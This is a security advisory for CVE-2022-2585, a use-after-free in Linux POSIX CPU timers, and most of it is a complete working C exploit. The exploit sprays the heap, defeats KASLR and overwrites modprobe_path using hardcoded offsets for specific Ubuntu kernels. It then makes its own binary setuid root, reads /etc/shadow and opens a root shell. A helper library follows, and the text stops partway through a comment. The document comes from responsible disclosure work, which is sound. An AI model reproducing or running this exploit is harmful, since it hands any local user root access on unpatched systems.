SSD Advisory – Linux CLOCK_THREAD_CPUTIME_ID LPE

TL;DR

A vulnerability in the way Linux handles the CLOCK_THREAD_CPUTIME_ID allows local attackers to reach a race condition and use this to elevate their privileges to root.

Vulnerability Summary

A race condition in the way CLOCK_THREAD_CPUTIME_ID works allows local users to double free a pointer allowing them control over the outcome of the second free call and to utilise it to elevate their privileges to root.

Credit

An independent security researcher has reported this to the SSD Secure Disclosure program during the TyphoonPWN 2022 event.

CVE

CVE-2022-2585

Vendor Response

The Linux Kernel team has released a patch to address this vulnerability: https://seclists.org/oss-sec/2022/q3/116

Vulnerability Analysis

The CLOCK_THREAD_CPUTIME_ID bug lies in the POSIX CPU timer component of the Linux kernel.

A CLOCK_THREAD_CPUTIME_ID timer is used for measuring the amount of CPU time consumed by a thread. Once timer_settime is called on this timer, the timer will be “armed”.

Then, the timer will be triggered (by sending the program a signal) after the thread has consumed a user-specified amount of CPU time. This feature is useful if the program wants to do something after consuming a specific amount of CPU time in a specific thread.

The Linux kernel implements this feature by linking the timer-associated struct k_itimer data structure into a doubly-linked list in struct posix_cputimers. Every time a timer interrupt is raised, a call chain like check_thread_timers->collect_posix_cputimers->collect_timerqueue is invoked.

This call chain checks whether the thread has consumed enough CPU time: if so, the timer “expires” (is triggered) and is added to a firing linked list. Then, every timer in the firing linked list is processed by calling posix_timer_event, which eventually sends a signal to the program.

Currently, in the Linux kernel, when a thread creates a thread cpu timer and then calls execve, it will try to clean up all the timers on behalf of the process using exit_itimers(me->signal);. This will free all the timers associated with the process in memory. However, it forgets to clean up the references in struct posix_cputimers.

In other words, if the timer is already armed before execve, the kernel will free the timer object while still maintaining a reference to it in the doubly linked timer list. When the time arrives, the kernel will walk through the linked list, find the freed timer, add it to the `firing` linked list, and try to trigger it, which causes a use-after-free situation.

Exploit

// must come before any #include so the system headers see it
#define _GNU_SOURCE

#include <endian.h>
#include <errno.h>
#include <pthread.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/syscall.h>
#include <sys/types.h>
#include <sys/mman.h>
#include <time.h>
#include <fcntl.h>
#include <unistd.h>
#include <assert.h>
#include <poll.h>
#include <sys/ioctl.h>
#include <sys/resource.h>
#include <sys/msg.h>
#include <net/if.h>
#include <netinet/ip.h>
#include <sys/wait.h>
#include <sys/shm.h>
#include <sys/utsname.h>
#include "libexp.h"

#define SPRAY_NUM1 100
#define SPRAY_NUM2 350
#define SPRAY_NUM3 200
#define PIPE_SPRAY_NUM 0x600
#define M_TS_LEN 0x1000
#define LEAK_SPRAY_NUM 0x1000
#define SHM_SPRAY_NUM 0x400
#define PAGE_SPRAY_NUM 0x100

#define def_kbase 0xffffffff81000000
struct config {
	char *release;
	u64 init_ipc_ns;
	u64 modprobe_path;
};

struct config configs[] = {
	{
		.release = "5.15.0-37-generic",
		.init_ipc_ns = 0xffffffff830824c0,
		.modprobe_path = 0xffffffff82e8b560
	},
	{
		.release = "5.15.0-39-generic",
		.init_ipc_ns = 0xffffffff83082580,
		.modprobe_path = 0xffffffff82e8b620
	},
	{
		.release = "5.15.0-40-generic",
		.init_ipc_ns = 0xffffffff83082580,
		.modprobe_path = 0xffffffff82e8b620
	}
};

int fd = 0;
int val = 0;
int *stage = &val;
int shm_fd = -1;
int *shm_stage;
timer_t timerids1[SPRAY_NUM1];
timer_t timerids2[SPRAY_NUM2];
timer_t timerids3[SPRAY_NUM3];
int pipe_fds[PIPE_SPRAY_NUM][2];
u64 kernel_base = 0;
u64 kaslr_slide = 0;
u64 kptr_vtable = 0;
u64 uptr_vtable = 0;
u64 msg_addr = 0;
u64 kbuf_addr = 0;
u64 ubuf_addr = 0;
char path[0x800];
u64 CPUID = 0;
u64 page_size = 0x1000;
char cpuid_env[0x20];
u64 init_ipc_ns = 0;
u64 modprobe_path = 0;

void *trigger_free(void *env_str)
{
	timer_t timerid;
	int ret = timer_create(CLOCK_THREAD_CPUTIME_ID, NULL, &timerid);
	assert(ret == 0);

	*stage = 1;
	while(*stage != 2);

	struct timespec tspec = {.tv_sec = 3, .tv_nsec = 0};
	struct itimerspec ispec = { .it_interval = tspec, .it_value = tspec};
	timer_settime(timerid, 0, &ispec, NULL);
	// getchar();

	// fd = memfd_create("exp", 0);
	// assert(fd >= 0);

	char *argv[] = {path, NULL};
	char *env[] = {env_str, cpuid_env, NULL};
	execve(path, argv, env);

	return NULL;
}

void spray_timer(timer_t *tids, u32 num)
{
	for(int i=0; i<num; i++) 
		timer_create(CLOCK_THREAD_CPUTIME_ID, NULL, &tids[i]);
}

void release_timer(timer_t *tids, u32 num, u32 jump)
{
	for(int i=0; i<num; i+=jump)
		timer_delete(tids[i]);
}

void leak_func()
{
	pthread_t tid;
	ts_fence();
	spray_timer(timerids1, SPRAY_NUM1);
	pthread_create(&tid, NULL, trigger_free, (void *)"LEAK=1");
	while(*stage != 1);
	spray_timer(timerids2, SPRAY_NUM2);
	spray_timer(timerids3, SPRAY_NUM3);

	release_timer(timerids1, SPRAY_NUM1, 1);
	release_timer(timerids2, SPRAY_NUM2, 1);
	release_timer(timerids3, SPRAY_NUM3, 2);

	//puts("Done");
	//int c = getchar();
	//printf("c : %#xn", c);
	//defragment(0x100, 0x1000);

	usleep(100*1000);
	*stage = 2;

	while(1);
}

void exp_func()
{
	pthread_t tid;
	ts_fence();
	spray_timer(timerids1, SPRAY_NUM1);
	pthread_create(&tid, NULL, trigger_free, (void *)"EXP=1");
	while(*stage != 1);
	spray_timer(timerids2, SPRAY_NUM2);
	spray_timer(timerids3, SPRAY_NUM3);

	release_timer(timerids1, SPRAY_NUM1, 1);
	release_timer(timerids2, SPRAY_NUM2, 1);
	release_timer(timerids3, SPRAY_NUM3, 2);

	usleep(100*1000);
	*stage = 2;

	while(1);
}

void leak_child_func()
{
	usleep(1000*100);

	// tell the parent process that the slab page is freed
	*shm_stage = 1;

	// wait for the parent process to reclaim the page
	while(*shm_stage != 2);

	// trigger unlink by exiting the process (in fact, the unlink happens in wait)
	puts("[!] Now trigger unlink in the child process!");
	exit(0);
}

void exp_child_func()
{
	usleep(1000*100);

	// tell the parent process that the slab page is freed
	*shm_stage = 1;

	// cannot sleep here or the timer will not be invoked
	// to avoid waiting CPU time (and increase the critical window), let's move it to another CPU
	set_cpu(CPUID);
	while(1);
}

int search_msgqid()
{
	int msgqid;
	struct msqid_ds ds;
	struct msginfo msginfo;
	int maxind = msgctl(0, MSG_INFO, (struct msqid_ds *) &msginfo);
	assert(maxind >= 0);

	char buffer[0x2000];
	int target_msgqid = -1;

	// printf("check %d msgsn", maxind);

	for(int i=0; i<maxind; i++) {
		int ret;
		msgqid = msgctl(i, MSG_STAT, &ds);
		assert(msgqid >= 0);
		for(int j=0; j<ds.msg_qnum; j++) {
			ret = msgrcv(msgqid, buffer, sizeof(buffer), 0, MSG_NOERROR | IPC_NOWAIT | MSG_COPY);
			assert(ret >= 0);
			if(ret >= 0x1000 && !memcmp(buffer, "AAAAAAAA", 8)) {
				target_msgqid = msgqid;
				// hex_print(buffer, 0x100);
				break;
			}
			msgrcv(msgqid, buffer, sizeof(buffer), 0, MSG_NOERROR | IPC_NOWAIT);
			if(j == ds.msg_qnum-1) {
				int ret = msgctl(msgqid, IPC_RMID, 0);
				assert(ret == 0);
			}
		}
	}
	return target_msgqid;
}

/*
 * Raise the soft RLIMIT_NOFILE limit of the calling process to its hard limit.
 * Aborts through assert() if either rlimit call fails.
 */
void increase_limit()
{
	struct rlimit nofile;

	// fetch the current soft/hard pair for open file descriptors
	int rc = getrlimit(RLIMIT_NOFILE, &nofile);
	assert(rc >= 0);

	// lift the soft limit up to the hard ceiling and apply it
	nofile.rlim_cur = nofile.rlim_max;
	rc = setrlimit(RLIMIT_NOFILE, &nofile);
	assert(rc >= 0);
}

u64 leak_kbuf_addr()
{
	timer_t defrag_timers[0x400];
	spray_timer(defrag_timers, 0x400);

	// trigger UAF first
	if(!fork()) {
		set_cpu(CPUID);
		leak_func(); // this function will call execve, so no return
		while(1);
	}

	// wait for the slab page to be freed
	while(*shm_stage != 1);

	// do page spray
	void *addr = umem_alloc(NULL, page_size);
	int s = pg_vec_spray(addr, page_size, PAGE_SPRAY_NUM);
	*shm_stage = 2;

	// wait for the unlink to happen
	wait(NULL);

	// now we should have the heap leak!
	void *addr2 = mmap(NULL, page_size*PAGE_SPRAY_NUM, PROT_READ|PROT_WRITE, MAP_SHARED, s, 0);
	assert((u64)addr2 != -1);
	u64 heap_addr = 0;
	int idx = 0;
	while(!heap_addr && idx < 0x10*100) {
		u64 *obj_ptr = (u64 *)(addr2 + idx*0x100);
		if(obj_ptr[15] != 0) {
			heap_addr = obj_ptr[15] - 0x78;
			ubuf_addr = (u64)(obj_ptr) & 0xfffffffffffff000;
			break;
		}
		idx += 1;
	}
	if(!heap_addr) {
		puts("[-] leak kbuf_addr failed (but it's OK)");
		// clean up
		munmap(addr2, page_size*PAGE_SPRAY_NUM);
		close(s);
		return 0;
	}
	return heap_addr & 0xfffffffffffff000;
}

u64 leak_msg_addr()
{
	int msgqids[LEAK_SPRAY_NUM];

	// allocate msgq first, it is also in kmalloc-256
	for(int i=0; i<LEAK_SPRAY_NUM; i++) {
		msgqids[i] = msgget(IPC_PRIVATE, 0644 | IPC_CREAT);
	}
	char buf[0xd0];
	memset(buf, 0, sizeof(buf));
	memset(&buf[0xb0], 'A', 0x20);
	memset(buf, 'A', 8);

	timer_t defrag_timers[0x100];
	spray_timer(defrag_timers, 0x100);

	// trigger UAF first
	if(!fork()) {
		set_cpu(CPUID);
		leak_func(); // this function will call execve, so no return
		while(1);
	}

	// wait for the slab page to be freed
	while(*shm_stage != 1);

	// do page spray
	void *addr = umem_alloc(NULL, page_size);
	int s = pg_vec_spray(addr, page_size, PAGE_SPRAY_NUM);
	*shm_stage = 2;

	// wait for the unlink to happen
	wait(NULL);

	// now we should have the heap leak!
	void *addr2 = mmap(NULL, page_size*PAGE_SPRAY_NUM, PROT_READ|PROT_WRITE, MAP_SHARED, s, 0);
	assert((u64)addr2 != -1);
	u64 heap_addr = 0;
	int idx = 0;
	while(!heap_addr && idx < page_size*PAGE_SPRAY_NUM/0x100) {
		u64 *obj_ptr = (u64 *)(addr2 + idx*0x100);
		if(obj_ptr[15] != 0) {
			heap_addr = obj_ptr[15] - 0x78;
			break;
		}
		idx += 1;
	}
	if(!heap_addr) {
		puts("[-] leak msg_addr failed (but it's OK)");
		// clean up
		munmap(addr2, page_size*PAGE_SPRAY_NUM);
		close(s);
		return 0;
	}

	// now try to free the page!
	munmap(addr2, page_size*PAGE_SPRAY_NUM);
	close(s);

	for(int i=0; i<LEAK_SPRAY_NUM; i++) {
		for(int j=0; j<4; j++) msgsnd(msgqids[i], buf, sizeof(buf)-8, IPC_NOWAIT);
	}
	return (heap_addr&0xfffffffffffff000) + 0x100;
}

void get_root()
{
	set_cpu(CPUID+1);
	int fd = open("/proc/sys/kernel/modprobe", 0);
	char buf[0x100];
	while(1) {
		lseek(fd, 0, SEEK_SET);
		read(fd, buf, sizeof(buf));
		if(!strncmp(buf, "//tmp/modprobe", 14)) break;
		sleep(1);
	}
	puts("[+] Payload is written! /proc/sys/kernel/modprobe now points to /tmp/modprobe!");
	system("echo 1 > /tmp/1; chmod +x /tmp/1; /tmp/1 2> /dev/null");
	char *argv[] = {path, NULL};
	char *env[] = {cpuid_env, NULL};
	execve(path, argv, env);
}

void context_setup()
{
	// handle CPUID
	char *id_str = getenv("CPUID");
	if(id_str) CPUID = atoi(id_str);
	else CPUID = cpu_num - 2;
	int ret = sprintf(cpuid_env, "CPUID=%lld", CPUID);
	assert(ret > 0);

	// handle page_size
	if(cpu_num >= 8) page_size = 0x2000;
	else page_size = 0x1000;
}

void prep_shm()
{
	shm_fd = open("/tmp/shm", O_RDWR|O_CREAT, 0666);
	ftruncate(shm_fd, 4);
	shm_stage = (int *)mmap(NULL, 0x1000, PROT_READ|PROT_WRITE, MAP_SHARED, shm_fd, 0);
	*shm_stage = 0;
}

void check_root()
{
	// if we are root
	if(open("/etc/shadow", 0) >= 0) {
		setuid(0);
		system("head -n 10 /etc/shadow");
		system("/bin/bash");
		exit(0);
	}

	// or if we can be root
	int tmp_fd = open("/proc/sys/kernel/modprobe", 0);
	char buf[0x2000];
	memset(buf, 0, sizeof(buf));
	read(tmp_fd, buf, sizeof(buf));
	if(!strncmp(buf, "//tmp/modprobe", 14)) {
		sprintf(buf, "echo '#!/bin/bashnchown root:root %s; chmod 04755 %s' > /tmp/modprobe; chmod +x /tmp/modprobe", path, path);
		system(buf);
		system("echo 1 > /tmp/1; chmod +x /tmp/1; /tmp/1 2> /dev/null");
		char *argv[] = {path, NULL};
		char *env[] = {cpuid_env, NULL};
		execve(path, argv, env);
	}
}

void setup_offsets(char *release)
{
	for(int i=0; i<sizeof(configs)/sizeof(configs[0]); i++) {
		if(!strcmp(configs[i].release, release)) {
			init_ipc_ns = configs[i].init_ipc_ns;
			modprobe_path = configs[i].modprobe_path;
			break;
		}
	}
	assert(init_ipc_ns != 0);
	assert(modprobe_path != 0);
}

int main(int argc, char **argv)
{
	context_setup();

	set_cpu(CPUID);
	increase_limit();

	// save absolute path for later use
	if(argc && argv[0] && argv[0][0]) assert(realpath(argv[0], path) != NULL);

	// trigger the UAF timer when trying to leak heap address
	if(getenv("LEAK")) {
		set_cpu(CPUID);
		prep_shm();
		leak_child_func();
		exit(0);
	}

	// trigger the UAF timer when trying to perform exploitation
	if(getenv("EXP")) {
		set_cpu(CPUID);
		prep_shm();
		exp_child_func();
		exit(0);
	}

	// in case we already are/can be root
	check_root();

	// first thing first, before we get into a namespace
	// we launch a process that wait for root
	if(!clean_fork()) {
		get_root();
		sleep(10000);
	}

	struct utsname uname_buf;
	assert(uname(&uname_buf) == 0);
	printf("CPUID:      %lldn", CPUID);
	printf("page_size:  %#llxn", page_size);
	printf("release:    %sn", uname_buf.release);

	setup_offsets((char *)&uname_buf.release);

	prep_shm();
	setup_sandbox();
	setup_pg_vec();

	// step 1: leak kbuf_addr
	puts("[*] try to leak kernel buffer addr");
	while(!kbuf_addr) {
		cleanup_msgs();
		usleep(100000);
		kbuf_addr = leak_kbuf_addr();
	}
	printf("[+] kbuf_addr: %#llxn", kbuf_addr);
	printf("[+] ubuf_addr: %#llxn", ubuf_addr);
	assert(kbuf_addr != 0);
	assert(ubuf_addr != 0);
	*(u64 *)ubuf_addr = 0x4141414141414141;

	// reset shm_stage for orchestration
	*shm_stage = 0;

	// step 2: leak msg_msg addr
	puts("[*] try to leak msg_msg addr");
	while(!msg_addr) {
		cleanup_msgs();
		usleep(100000);
		msg_addr = leak_msg_addr();
	}
	printf("[+] msg_msg addr: %#llxn", msg_addr);
	assert(msg_addr != 0);

	// reset shm_stage for orchestration
	*shm_stage = 0;
	// step 2: trigger the vulnerability again and reclaim the page
	// trigger UAF
	if(!fork()) {
		set_cpu(CPUID);
		exp_func(); // this function will call execve, so no return
		while(1);
	}

	// wait for the slab page to be freed
	while(*shm_stage != 1);

	// do page spray, the payload is used for trapping CPU0 to an infinite loop so we can
	// later modify the memory in CPU1
	void *addr = umem_alloc(NULL, page_size);
	*(u64 *)(ubuf_addr+0x130) = kbuf_addr+0x120;
	for(int i=0; i<page_size/0x100; i++) {
		u64 *obj_ptr = (u64 *)(addr-0x40+-2+i*0x100);
		obj_ptr[10] = M_TS_LEN; // timer->it_requeue_pending
		obj_ptr[11] = 0x000000012a05f200;
		obj_ptr[14] = msg_addr-0x20; // timer->sigq
		obj_ptr[16] = kbuf_addr + 0x120;
		obj_ptr[17] = kbuf_addr + 0x100;
		obj_ptr[18] = 0x000000012a061742;
		obj_ptr[19] = kbuf_addr; // head
	}
	int s = pg_vec_spray(addr, page_size, PAGE_SPRAY_NUM);
	*shm_stage = 2;

	// now, wait for the timer to get triggered.
	// when it is triggered, timer->firing will become 1, then we know where is the timer
	// in the buffer and the CPU0 is halted
	set_cpu(CPUID+1); // switch to CPU1 because CPU0 will hang
	void *addr2 = mmap(NULL, page_size*PAGE_SPRAY_NUM, PROT_READ|PROT_WRITE, MAP_SHARED, s, 0);
	u64 *timer_ptr = NULL;
	while(!timer_ptr) {
		int idx = 0;
		while(idx < page_size*PAGE_SPRAY_NUM/0x100) {
			u64 *obj_ptr = (u64 *)(addr2 + idx*0x100);
			// if(idx % 0x10==0)printf("a: %pn", obj_ptr);
			if(obj_ptr[23] == 1) {// tmr.firing == 1
				timer_ptr = obj_ptr;
				break;
			}
			idx++;
		}
	}

	// now we know tmr->firing is set, CPU0 is going to be trapped very soon
	// let's waste a few cycles to ensure that
	read(-1, NULL, 0);

	// now we are sure CPU0 is trapped =>
	// 1. clear out the timer's first part to avoid locking issues
	// 2. modify the timer so it won't be added to the firing list again immediately, but will be triggered in 2 seconds
	// 3. release CPU0 by making it think it reaches a leaf node
	memset(timer_ptr, 0, 0x50);
	timer_ptr[18] = 0x000000012a061742*2;
	*(u64 *)(ubuf_addr + 0x130) = 0;

	// now we are back to CPU0!	so we spray in the per-CPU cache!
	set_cpu(CPUID);
	printf("[+] timer_ptr: %pn", timer_ptr);

	// at this moment, we have a msg_msg with an enlarged m_ts, let's find it!
	puts("[*] Looking for the victim msg_msg...");
	int msgqid = search_msgqid();
	assert(msgqid >= 0);
	printf("[+] Found it! msgqid: %dn", msgqid);

	// alright, let's spray tons of shmid to leak kaslr
	int shmids[SHM_SPRAY_NUM];
	char buffer[0x2000];
	memset(buffer, 0, sizeof(buffer));
	for(int i=0; i<SHM_SPRAY_NUM; i++) shmids[i] = shmget(IPC_PRIVATE, 1, 0600);
	int ret = msgrcv(msgqid, buffer, sizeof(buffer), 0, MSG_NOERROR | IPC_NOWAIT | MSG_COPY);
	assert(ret >= 0);
	// search for shmid, we can't be unluckly enough that there is no shmid_kernel in the PAGE?
	for(int i=0; i<(page_size/0x100)-2; i++) {
		u64 *obj_ptr = (u64 *)(buffer + 0xd0 + i*0x100);
		u64 val = obj_ptr[29]; // shmid_kernel->ns, should be init_ipc_ns
		if(((val-init_ipc_ns) & 0xfff) == 0) {
			kaslr_slide = val - init_ipc_ns;
			kernel_base = kaslr_slide + def_kbase;
			break;
		}
	}
	printf("[+] kernel_base: %#llxn", kernel_base);
	printf("[+] kaslr_slide: %#llxn", kaslr_slide);
	if(kernel_base == 0) {
		hex_print(buffer, sizeof(buffer));
		timer_ptr[18] = 0xffffffffffff;// disarm timer to avoid crash
		getchar();
		exit(0);
	}
	assert(kernel_base != 0);

	// now we have KASLR leak and the timer will be triggered again in a few seconds
	// let's prepare the timer
	*(u64 *)(ubuf_addr+0x130) = kbuf_addr+0x120;
	timer_ptr[10] = 0x706d742f-1; // timer->it_requeue_pending => /tmp
	timer_ptr[11] = 0x000000012a05f200;
	timer_ptr[14] = kaslr_slide + modprobe_path - 0x38 + 1; // overwrirte modprobe_path+1 with /tmp => /sbin/modprobe becomes //tmp/modprobe
	timer_ptr[15] = 0;
	timer_ptr[16] = kbuf_addr + 0x120;
	timer_ptr[17] = kbuf_addr + 0x100;
	timer_ptr[18] = 0x000000012a061742*2;
	timer_ptr[19] = kbuf_addr; // head

	// switch to CPU1 again because we know CPU0 will be trapped again in a few seconds
	set_cpu(CPUID+1);

	// now wait CPU0 to get trapped
	timer_ptr[23] = 0; // tmr->firing = 0
	while(!timer_ptr[23]); // wait for firing to be set
	read(-1, NULL, 0); // waste a few cycles to ensure CPU0 is trapped

	// 1. make sure the timer will not be triggered again by setting a huge expire value
	// 2. resume its execution, write a heap pointer before modprobe_path so that send_sigqueue will not panic
	timer_ptr[18] = 0xffffffffffff;
	*(u64 *)(ubuf_addr + 0x130) = kaslr_slide + modprobe_path - 0x30 - 6; 

	// prepare payload
	puts("[*] Waiting for payload to be written into '/proc/sys/kernel/modprobe'...");
	sprintf(buffer, "echo '#!/bin/bashnchown root:root %s; chmod 04755 %s' > /tmp/modprobe; chmod +x /tmp/modprobe", path, path);
	system(buffer);
	// now wait for the get_root subprocess to wake up and launch a root shell
	wait(NULL);

	return 0;
}
#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <fcntl.h>
#include <unistd.h>
#include <stdarg.h>
#include <sched.h>
#include <time.h>
#include <poll.h>
#include <signal.h>
#include <keyutils.h>
#include <pthread.h>
#include <errno.h>
#include <sys/types.h>
#include <sys/ipc.h>
#include <sys/msg.h>
#include <sys/mman.h>
#include <sys/prctl.h>
#include <sys/ioctl.h>
#include <sys/socket.h>
#include <sys/syscall.h>
#include <linux/userfaultfd.h>
#include <arpa/inet.h>
#include <x86intrin.h>
#include <linux/if_packet.h>
#include <net/ethernet.h>
#include <net/if.h>
#include <netinet/ip.h>

#include "libexp.h"

struct fault_struct {
	int uffd;
	struct fault_struct *next;
	void *addr;
	size_t len;
	void *src_page;
	void (*hook)(void *);
};

static u64 min_cpu_freq;
static u64 min_granularity;
static u64 min_slice_tsc;
static u64 msgmnb;
static u64 mem_size;
static u64 optmem_max;
static int urand_fd;
u64 cpu_num;
struct cpu_info *idle_cpus;
cpu_set_t cpu_mask;
size_t kmalloc_size_array[13] = {0x8, 0x10, 0x20, 0x40, 0x60, 0x80, 0xc0, 0x100, 0x200, 0x400, 0x800, 0x1000, 0x2000};

#define DEBUG 0
#define dprintf(...) if(DEBUG) printf(__VA_ARGS__)
#define PAGE_SHIFT 12
#define PAGE_SIZE (1 << PAGE_SHIFT)
#define PFN_MIN 0

#define CPU_FREQ_FILE "/sys/devices/system/cpu/cpu0/cpufreq/cpuinfo_min_freq"
#define SCHED_GRAN_FILE "/proc/sys/kernel/sched_min_granularity_ns"
#define MSGMNB_FILE "/proc/sys/kernel/msgmnb"
#define CPU_INFO_FILE "/proc/cpuinfo"
#define MEM_INFO_FILE "/proc/meminfo"
#define OPTMEM_MAX_FILE "/proc/sys/net/core/optmem_max"
#define SCHED_DEBUG_FILE "/proc/sched_debug"
#define SUPPRESS_PROC_NUM 20
#define UNIV_SPRAY_FILE "/tmp/univ_spray_dummy"

/*
 * Fill dest with `length` characters drawn from [0-9a-zA-Z] and NUL-terminate it.
 *
 * dest must have room for length + 1 bytes. The raw bytes are read from the
 * file-scope descriptor urand_fd (presumably a random device opened during
 * library setup -- that code is not visible here).
 */
void rand_str(char *dest, size_t length)
{
	static const char charset[] = "0123456789"
	                              "abcdefghijklmnopqrstuvwxyz"
	                              "ABCDEFGHIJKLMNOPQRSTUVWXYZ";
	const size_t charset_len = sizeof(charset) - 1;

	// zero first so a short or failed read still leaves defined bytes to map
	memset(dest, 0, length);
	ssize_t got = read(urand_fd, dest, length);
	(void)got; // best effort: unread bytes simply map to charset[0]

	for(size_t i=0; i<length; i++) {
		// index through unsigned char: plain char may be signed, and a
		// negative byte would make % produce an out-of-bounds index
		dest[i] = charset[(unsigned char)dest[i] % charset_len];
	}
	dest[length] = '\0';
}

/*
 * Dump len bytes starting at addr to stdout, 16 bytes per row.
 *
 * Each row shows the row's address followed by two 64-bit words in host byte
 * order. A trailing partial row is zero-padded instead of being read past
 * addr + len.
 */
void hex_print(void *addr, size_t len)
{
	const unsigned char *bytes = addr;

	puts("");
	for(size_t off = 0; off < len; off += 0x10) {
		unsigned long long lo = 0, hi = 0;
		size_t remain = len - off;
		size_t lo_len = remain < 8 ? remain : 8;
		size_t hi_len = remain > 8 ? remain - 8 : 0;
		if(hi_len > 8) hi_len = 8;

		// memcpy keeps the loads inside the buffer and free of alignment assumptions
		memcpy(&lo, bytes + off, lo_len);
		if(hi_len) memcpy(&hi, bytes + off + 8, hi_len);

		printf("0x%016llx: 0x%016llx 0x%016llx\n",
		       (unsigned long long)(size_t)(bytes + off), lo, hi);
	}
}

/*
 * Print a printf-style message and a newline to stdout, then the errno reason
 * via perror(), and terminate the process with exit(-1). Never returns.
 */
void error_out(const char *fmt, ...)
{
	// capture errno first: the printing calls below may overwrite it
	int saved_errno = errno;
	va_list ap;

	// format straight to stdout; no intermediate heap copy is needed
	va_start(ap, fmt);
	vprintf(fmt, ap);
	va_end(ap);
	putchar('\n');

	// report the error that was current when the caller failed
	errno = saved_errno;
	perror("[Reason] ");
	exit(-1);
}

/*
 * Read up to 0x100 bytes from fname and parse the leading decimal number.
 *
 * Exits through error_out() if the file cannot be opened or yields no data.
 * The result is whatever atoll() makes of the content, converted to u64.
 */
static u64 _read_u64_from_file(const char *fname)
{
	char buf[0x100 + 1];
	FILE *f = fopen(fname, "r");

	if(f == NULL) error_out("fail to open %s", fname);

	// read content
	size_t nread = fread(buf, 1, sizeof(buf) - 1, f);
	if(nread == 0) error_out("fail to fread on %s", fname);
	fclose(f);

	// terminate right after the bytes actually read, so parsing can never
	// continue into uninitialised stack memory
	buf[nread] = 0;

	return atoll(buf);
}

/*
 * Return the first entry of kmalloc_size_array that is strictly greater than
 * num. The comparison is strict, so a num equal to an entry maps to the next
 * larger entry. Exits through error_out() when no entry is large enough.
 */
static size_t kmalloc_size(size_t num)
{
	const size_t count = sizeof(kmalloc_size_array)/sizeof(kmalloc_size_array[0]);

	for(size_t i=0; i<count; i++) {
		if(kmalloc_size_array[i] > num) return kmalloc_size_array[i];
	}
	error_out("%zu is too large to fit in kmalloc", num);
	return 0; // not reached: error_out() exits
}

/*
 * Determine a CPU frequency value.
 *
 * Prefers the integer stored in CPU_FREQ_FILE, returned as read. Otherwise it
 * takes the first "cpu MHz" line of CPU_INFO_FILE and converts it from MHz to
 * KHz. Exits through error_out() when neither source yields a value.
 */
static u64 _get_cpu_freq(void)
{
	// try to read from the sysfs file first
	if(access(CPU_FREQ_FILE, R_OK) == 0)
		return _read_u64_from_file(CPU_FREQ_FILE);

	// try to read from /proc/cpuinfo
	FILE *f = fopen(CPU_INFO_FILE, "r");
	if(f != NULL) {
		char *line_buf = NULL;
		size_t n = 0;
		int found = 0;
		double freq = 0;

		// look for cpu MHz; getline() returning < 0 covers both EOF and errors
		while(getline(&line_buf, &n, f) >= 0) {
			if(!strstr(line_buf, "cpu MHz")) continue;

			// the value follows the first ':'; skip malformed lines
			char *colon = strchr(line_buf, ':');
			if(!colon) continue;

			freq = atof(colon + 1) * 1000;// MHz to KHz
			found = 1;
			break;
		}

		// release the line buffer and the stream on every path
		free(line_buf);
		fclose(f);
		if(found) return (u64)freq;
	}

	error_out("fail to get cpu frequency");
	return -1;
}

/*
 * Return the value stored in SCHED_GRAN_FILE, or 3000000 when that file is
 * not readable.
 */
static u64 _get_min_gran(void)
{
	// no readable sysctl file: fall back to a commonly used default value
	if(access(SCHED_GRAN_FILE, R_OK) != 0)
		return 3000000;

	return _read_u64_from_file(SCHED_GRAN_FILE);
}

static u64 _get_cpu_num(void)
{
	return sysconf(_SC_NPROCESSORS_ONLN);
}

/*
 * Parse the first line of MEM_INFO_FILE and return the number after the ':'
 * multiplied by 1024 (presumably the MemTotal entry in kB, giving bytes --
 * confirm against the /proc/meminfo layout).
 *
 * Exits through error_out() if the file cannot be opened or parsed.
 */
static u64 _get_mem_size(void)
{
	FILE *f = fopen(MEM_INFO_FILE, "r");
	char *line_buf = NULL;
	size_t n = 0;
	u64 size = 0;
	int parsed = 0;

	if(unlikely(f == NULL)) error_out("fail to open /proc/meminfo");

	if(getline(&line_buf, &n, f) >= 0) {
		// the value follows the first ':'; a line without one is a parse failure
		char *colon = strchr(line_buf, ':');
		if(colon) {
			size = atoll(colon + 1) * 1024;
			parsed = 1;
		}
	}

	// release resources before any exit path
	free(line_buf);
	fclose(f);

	if(!parsed) error_out("fail to read memory size");
	return size;
}

/* Spin forever without yielding; never returns. */
static void busy_loop(void)
{
	for(;;) {
	}
}

/*
 * fork() wrapper whose child asks the kernel to send it SIGKILL when its
 * parent dies (PR_SET_PDEATHSIG).
 *
 * Returns fork()'s result unchanged: 0 in the child, the child's pid in the
 * parent, or -1 on failure. The child exits through error_out() if the
 * prctl() call fails.
 */
pid_t clean_fork(void)
{
	pid_t child = fork();

	// only the child (fork() == 0) registers the parent-death signal
	if(child == 0 && prctl(PR_SET_PDEATHSIG, SIGKILL) < 0)
		error_out("fail to register DEATHSIG");

	return child;
}

void anti_swapper(void (*hook)(void))
{
	for(int i=0; i<cpu_num; i++) {
		if(!clean_fork()) {
			set_cpu(i);
			if(hook) hook();
			busy_loop();
		}
	}
}

void suppress_int(void (*hook)(void))
{
	for(int i=0; i<cpu_num; i++) {
		// for each core spawn SUPPRESS_PROC_NUM dummy process
		for(int j=0; j<SUPPRESS_PROC_NUM; j++) {
			if(!clean_fork()) {
				set_cpu(i);
				if(hook) hook();
				busy_loop();
			}
		}
	}
}

void ts_fence(void)
{
	cpu_set_t my_set;

	// Step1: get current affinity mask
	if(sched_getaffinity(0, sizeof(my_set), &my_set)) error_out("fail to get cpu affinity");

	// Step2: pin CPU to current CPU to avoid task migration and get wrong tsc
	set_cpu(sched_getcpu());

	// Step3: do context switch detection
	register u64 start = __rdtsc();
	register u64 prev = start;
	register u64 now = start;
	while(1) {
		now = __rdtsc();
		if(unlikely(now - prev > min_slice_tsc)) break;
		if(unlikely(now - start > 5*min_slice_tsc)) {
			// puts("[Info] Have been waiting for a reschedule for too long, gonna yield and hope next time we get a new time slice");
			sched_yield();
			break;
		}
		prev = now;
	}

	// Step4: restore affinity mask
	if(sched_setaffinity(0, sizeof(my_set), &my_set)) error_out("fail to set cpu affinity");
}

/*
 * Restrict the calling thread's CPU affinity to the single CPU `cpuid`.
 * Exits through error_out() if the affinity cannot be applied.
 */
void set_cpu(int cpuid)
{
	cpu_set_t target;

	// build a mask containing only the requested CPU
	CPU_ZERO(&target);
	CPU_SET(cpuid, &target);

	if(sched_setaffinity(0, sizeof(target), &target) == 0)
		return;
	error_out("set cpu affinity at cpu: %d fails", cpuid);
}

/*
 * Apply the file-scope affinity mask cpu_mask to the calling thread.
